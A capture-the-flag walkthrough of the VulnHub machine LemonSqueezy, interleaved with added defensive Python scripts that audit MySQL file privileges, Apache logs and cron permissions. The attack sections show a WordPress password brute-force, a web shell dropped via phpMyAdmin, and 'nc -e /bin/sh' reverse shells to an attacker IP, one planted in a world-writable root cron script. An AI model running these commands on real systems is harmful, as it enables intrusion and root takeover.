[VLN] LemonSqueezy

Today we are going to hack the VulnHub machine called LemonSqueezy. You can download it from the following link: LemonSqueezy


Enumeration


We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 21:29 CEST
Nmap scan report for lemonsqueezy.home (192.168.1.10)
Host is up (0.00054s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.42 seconds
We see that only port 80 is open, so let's dig a little deeper.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.10
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/06 21:30:00 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/javascript (Status: 301)
/manual (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2020/05/06 21:30:03 Finished
===============================================================
It has a couple of interesting directories, wordpress and phpmyadmin. Let's explore the WordPress install to see if we can extract some information:

sml@Cassandra:~$ wpscan --url http://192.168.1.10/wordpress --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.1.10/wordpress/ [192.168.1.10]
[+] Started: Wed May  6 21:33:00 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.1.10/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.1.10/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.1.10/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.1.10/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.1.10/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.1.10/wordpress/, Match: 'WordPress 4.8.9'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] orange
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] lemon
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed May  6 21:33:02 2020
[+] Requests Done: 26
[+] Cached Requests: 26
[+] Data Sent: 6.488 KB
[+] Data Received: 227.2 KB
[+] Memory used: 110.84 MB
[+] Elapsed time: 00:00:01
We find the users orange and lemon :) Let's brute-force orange's password using rockyou.

sml@Cassandra:~$ wpscan --url http://192.168.1.10/wordpress --passwords rockyou.txt --usernames orange --max-threads 50
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.1.10/wordpress/ [192.168.1.10]
[+] Started: Wed May  6 21:39:55 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.1.10/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.1.10/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.1.10/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.1.10/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.1.10/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.1.10/wordpress/, Match: 'WordPress 4.8.9'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=========================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
Trying orange / ginger Time: 00:00:02 <=========================================================================> (165 / 165) 100.00% Time: 00:00:02
[SUCCESS] - orange / ginger

[!] Valid Combinations Found:
 | Username: orange, Password: ginger

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed May  6 21:40:18 2020
[+] Requests Done: 189
[+] Cached Requests: 26
[+] Data Sent: 90.547 KB
[+] Data Received: 104.191 KB
[+] Memory used: 930.492 MB
[+] Elapsed time: 00:00:22
We get the password "ginger". We log into WordPress with the credentials orange/ginger; under Posts there is a draft, "keep this safe!", containing: n0t1n@w0rdl1st! It looks like a password :) We go to http://192.168.1.10/phpmyadmin/ and use the credentials orange/n0t1n@w0rdl1st! to log in.

Exploitation


Once inside phpMyAdmin, we create a file "b.php" that we will use to get a reverse shell, so we open "Console" and enter:

SELECT "" into outfile "/var/www/html/wordpress/b.php"
We set nc listening:

sml@Cassandra:~$ nc -nlvp 5555
And we visit: http://lemonsqueezy/wordpress/b.php?cmd=nc -e /bin/sh 192.168.1.148 5555
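SELECT ... INTO OUTFILE only works for an account that holds the global FILE privilege, and the server variable secure_file_priv decides where it is allowed to write; both had to be permissive for b.php to land in the web root. The audit function below is an added example, not code from the original post: given the value of secure_file_priv as SHOW VARIABLES prints it and the SHOW GRANTS lines for an account, it reports whether that account could drop a file under the web root. The grant strings and the web root path used in it are constructed assumptions, not values taken from the machine.

```python
import re

# Constructed example, not the page's own code. Two server-side facts decide
# whether an account can plant a file with SELECT ... INTO OUTFILE:
#   - FILE is a global privilege, so only grants scoped to *.* can confer it
#     (ALL PRIVILEGES ON *.* includes it);
#   - secure_file_priv bounds where mysqld writes: "" means anywhere the mysqld
#     process has OS write access, a directory restricts writes to that tree,
#     and NULL disables INTO OUTFILE / LOAD DATA INFILE entirely.
GRANT_RE = re.compile(r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO ", re.IGNORECASE)


def has_file_privilege(grants):
    """True if any SHOW GRANTS line gives the account the FILE privilege."""
    for grant in grants:
        m = GRANT_RE.match(grant.strip())
        if not m or m.group("scope") != "*.*":
            continue                      # per-database grants cannot carry FILE
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & {"ALL PRIVILEGES", "ALL", "FILE"}:
            return True
    return False


def write_scope(secure_file_priv):
    """Translate secure_file_priv into 'disabled', 'anywhere' or a directory."""
    if secure_file_priv is None or secure_file_priv.upper() == "NULL":
        return "disabled"
    if secure_file_priv == "":
        return "anywhere"
    return secure_file_priv.rstrip("/") + "/"


def outfile_risk(secure_file_priv, grants, web_roots=("/var/www/html/",)):
    """Report, for one account, whether INTO OUTFILE could reach a web root.
    This describes what the server would permit; the OS permissions of the
    mysqld user on the web root are a separate check."""
    scope = write_scope(secure_file_priv)
    file_priv = has_file_privilege(grants)
    if not file_priv or scope == "disabled":
        web_root = False
    elif scope == "anywhere":
        web_root = True
    else:
        web_root = any(root.startswith(scope) for root in web_roots)
    return {"file_priv": file_priv, "write_scope": scope, "web_root_writable": web_root}


if __name__ == "__main__":
    # Constructed grants: an all-powerful account next to a least-privilege one.
    full = ["GRANT ALL PRIVILEGES ON *.* TO 'orange'@'localhost' WITH GRANT OPTION"]
    wp = ["GRANT USAGE ON *.* TO 'wp'@'localhost'",
          "GRANT SELECT, INSERT, UPDATE, DELETE ON `wordpress`.* TO 'wp'@'localhost'"]
    print("unrestricted + ALL:", outfile_risk("", full))
    print("mysql-files dir + ALL:", outfile_risk("/var/lib/mysql-files", full))
    print("unrestricted + per-db grants:", outfile_risk("", wp))
```

The function reports the two conditions separately so a reviewer can see which one is missing. Pointing secure_file_priv at a directory outside the web root (MySQL's own packages default it to /var/lib/mysql-files, MariaDB leaves it empty), or setting it to NULL, and giving the WordPress database user only per-database privileges instead of ALL PRIVILEGES ON *.*, each close this path on their own.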

Low Shell



sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.10] 42244
python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We're in :)
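Both halves of this foothold leave an obvious trace in the Apache access log: the wpscan password attack sent its 165 guesses as POSTs to xmlrpc.php within a couple of seconds, and the shell came from a GET to a .php file that WordPress never shipped, with the command in the query string. The script below is an added example, not part of the original post; it runs two checks over combined-format access-log lines: a burst of xmlrpc.php POSTs from one client IP inside a sliding window, and successful requests to .php files in the site root that are not part of WordPress. The log lines, the threshold of 20 POSTs per minute and the /wordpress/ site root are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Apache "combined"-style access log. The SAMPLE_LOG lines further down are
# constructed for this example; they are not logs from the LemonSqueezy machine.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """One log line -> dict with ip, ts (datetime), method, path, status; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def xmlrpc_bursts(lines, threshold=20, window=timedelta(seconds=60)):
    """Clients that POSTed to xmlrpc.php more than `threshold` times inside any
    `window`, returned as {ip: total xmlrpc POSTs}. The wpscan run above pushed
    165 guesses through xmlrpc.php in about two seconds, so this threshold still
    leaves room for legitimate pingback and mobile-app traffic."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and urlsplit(rec["path"]).path.endswith("/xmlrpc.php"):
            per_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):          # sliding window over sorted timestamps
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = len(stamps)
                break
    return flagged


# PHP files WordPress ships directly in its install directory. A 200 for any
# other .php file there (b.php above) means code was added to the web root.
WP_ROOT_PHP = {
    "index.php", "wp-activate.php", "wp-blog-header.php", "wp-comments-post.php",
    "wp-config.php", "wp-cron.php", "wp-links-opml.php", "wp-load.php",
    "wp-login.php", "wp-mail.php", "wp-settings.php", "wp-signup.php",
    "wp-trackback.php", "xmlrpc.php",
}


def unexpected_php_hits(lines, site_root="/wordpress/"):
    """Successful requests to .php files in the site root that WordPress does not
    ship, as (ip, path, value of a 'cmd' query parameter or '')."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["status"] != 200:
            continue
        url = urlsplit(rec["path"])
        if not url.path.startswith(site_root) or not url.path.endswith(".php"):
            continue
        name = url.path[len(site_root):]
        if "/" in name or name in WP_ROOT_PHP:   # subdirectories and stock files are out of scope here
            continue
        cmd = parse_qs(url.query).get("cmd", [""])[0]
        hits.append((rec["ip"], url.path, cmd))
    return hits


# Constructed sample: one normal visitor (.50), one client (.148) that hammers
# xmlrpc.php 25 times in 25 seconds and then calls the dropped b.php.
SAMPLE_LOG = (
    ['192.168.1.50 - - [06/May/2020:21:38:10 +0200] "GET /wordpress/ HTTP/1.1" 200 5123',
     '192.168.1.50 - - [06/May/2020:21:38:12 +0200] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 412']
    + [f'192.168.1.148 - - [06/May/2020:21:40:{s:02d} +0200] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 412'
       for s in range(25)]
    + ['192.168.1.148 - - [06/May/2020:21:45:03 +0200] "GET /wordpress/b.php?cmd=nc%20-e%20/bin/sh%20192.168.1.148%205555 HTTP/1.1" 200 0',
       '192.168.1.50 - - [06/May/2020:21:46:00 +0200] "GET /wordpress/index.php?p=1 HTTP/1.1" 200 5123']
)

if __name__ == "__main__":
    print("xmlrpc bursts:", xmlrpc_bursts(SAMPLE_LOG))
    print("unexpected php:", unexpected_php_hits(SAMPLE_LOG))
```

On a live host both checks would read /var/log/apache2/access.log instead of SAMPLE_LOG. The XML-RPC check matters because wpscan's password attack above went through xmlrpc.php rather than wp-login.php, so a login-page rate limit alone would not have slowed it; disabling XML-RPC when nothing needs it, or rate-limiting POSTs to it, is the matching mitigation, and the second check is a cheap way to notice a file that should never have appeared in the web root.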

user.txt



$ cd /var/www
$ ls
html  user.txt
$ cat user.txt
TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH

Post-Exploitation


We explore the system and see that we have write permission on /var/www/html/wordpress. We download the linpeas.sh[1] script and check its output to see whether it shows anything interesting...

$ cd /var/www/html/wordpress
$ wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
--2020-05-28 07:04:56--  https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.132.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.132.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 225621 (220K) [text/plain]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 220.33K  --.-KB/s    in 0.1s    

2020-05-28 07:04:56 (2.17 MB/s) - 'linpeas.sh' saved [225621/225621]

$ chmod +x linpeas.sh


----SNIP----

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

*/2 *   * * *   root    /etc/logrotate.d/logrotate

----SNIP----

Privilege Escalation


We see there is a task that runs every 2 minutes: /etc/logrotate.d/logrotate is executed as root.... Let's check whether we can modify the file:

$ ls -l /etc/logrotate.d/logrotate
-rwxrwxrwx 1 root root 101 Apr 26 14:45 /etc/logrotate.d/logrotate
We see that we can :) We modify it to get a reverse shell as root... We set nc listening:

sml@Cassandra:~$ nc -nlvp 6666
We modify the script and wait a couple of minutes...

$ echo "#!/usr/bin/env python" > /etc/logrotate.d/logrotate
$ echo "import os" >> /etc/logrotate.d/logrotate
$ echo "os.system('nc -e /bin/sh 192.168.1.148 6666')" >> /etc/logrotate.d/logrotate
And after the wait...

sml@Cassandra:~$ nc -nlvp 6666
listening on [any] 6666 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.10] 33404
python -c 'import pty; pty.spawn("/bin/sh")'
# id
uid=0(root) gid=0(root) groups=0(root)
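The escalation worked because a root cron job executed a script that any user on the box could edit. The audit below is an added example, not code from the original post: it parses /etc/crontab-style lines (five schedule fields, user, command), takes the first token of each command as the executable, and reports ownership and permission problems: a world- or group-writable file, a file not owned by root for a root job, and a world-writable parent directory without the sticky bit. The demo() function builds a throwaway directory with one 0777 script, mirroring the -rwxrwxrwx logrotate above, next to a correctly permissioned one; those paths and the crontab text are constructed.

```python
import os
import re
import shutil
import stat
import tempfile

# Constructed example, not the page's own code. The linpeas excerpt above
# showed "*/2 *   * * *   root    /etc/logrotate.d/logrotate" in /etc/crontab
# and that script turned out to be mode 777.

# /etc/crontab layout: five schedule fields, user, command. Environment lines
# such as "SHELL=/bin/sh" and comments are skipped.
CRON_RE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")


def parse_crontab(text):
    """Return [(user, command), ...] for every job line in /etc/crontab-style text."""
    jobs = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue
        m = CRON_RE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs


def audit_job(user, cmd):
    """Tags explaining why the file a cron job executes could be altered by
    someone other than the user it runs as. Relative or missing paths are skipped."""
    target = cmd.split()[0]
    tags = set()
    if not os.path.isabs(target) or not os.path.exists(target):
        return tags
    st = os.stat(target)
    if st.st_mode & stat.S_IWOTH:
        tags.add("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        tags.add("group-writable")
    if user == "root" and st.st_uid != 0:
        tags.add("not-owned-by-root")
    parent = os.stat(os.path.dirname(target))
    # a world-writable parent without the sticky bit lets anyone replace the file
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        tags.add("dir-world-writable")
    return tags


def audit_crontab(text):
    """{command: tags} for every job with at least one finding."""
    findings = {}
    for user, cmd in parse_crontab(text):
        tags = audit_job(user, cmd)
        if tags:
            findings[cmd] = tags
    return findings


def demo():
    """Build a throwaway directory with one 0777 script (as on the machine above)
    and one 0755 script, audit a crontab that runs both as root, and return
    (findings, bad_path, good_path)."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "logrotate"), os.path.join(d, "backup.sh")
    for path in (bad, good):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho ok\n")
    os.chmod(bad, 0o777)                 # -rwxrwxrwx, the finding on this box
    os.chmod(good, 0o755)                # the expected mode for a root cron script
    crontab = (
        "SHELL=/bin/sh\n"
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
        "# constructed entries for the demo\n"
        f"*/2 *   * * *   root    {bad}\n"
        f"0 3 * * *   root    {good} --full\n"
    )
    findings = audit_crontab(crontab)
    shutil.rmtree(d)
    return findings, bad, good


if __name__ == "__main__":
    for cmd, tags in demo()[0].items():
        print(cmd, "->", ", ".join(sorted(tags)))
```

On a real host the same functions take the contents of /etc/crontab and each file under /etc/cron.d; a clean result is every root job pointing at a file that is root-owned, mode 755 or stricter, in a directory that is not world-writable. For this machine that means chmod 755 plus root ownership on /etc/logrotate.d/logrotate, which removes the write access that the escalation relied on.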

root.txt



# cd /root
# ls
root.txt
# cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=

End


And with this we are root on the machine :)

[1] https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh